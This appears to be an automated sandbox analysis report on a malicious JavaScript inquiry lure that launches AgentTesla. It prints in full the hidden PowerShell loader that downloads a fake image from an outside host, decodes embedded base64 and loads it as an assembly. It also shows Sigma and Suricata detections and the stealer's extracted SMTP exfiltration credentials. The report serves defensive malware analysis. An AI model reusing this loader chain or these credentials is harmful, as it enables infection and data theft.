? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ?

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js", ProcessId: 7472, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ?

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ?

Suricata Signatures

ET MALWARE Malicious Base64 Encoded Payload In Image - Source IP: 207.241.227.86 - Destination IP: 192.168.2.8

Timestamp:	2024-08-30T10:38:57.090961+0200
SID:	2049038
Severity:	1
Source Port:	443
Destination Port:	49705
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 - Source IP: 78.142.208.13 - Destination IP: 192.168.2.8

Timestamp:	2024-08-30T10:38:59.354996+0200
SID:	2020423
Severity:	1
Source Port:	443
Destination Port:	49706
Protocol:	TCP
Classtype:	Exploit Kit Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Avira URL Cloud: Label: malware

Found malware configuration

Source: 7.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}

Source: unknown	HTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.142.208.13:443 -> 192.168.2.8:49706 version: TLS 1.2

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
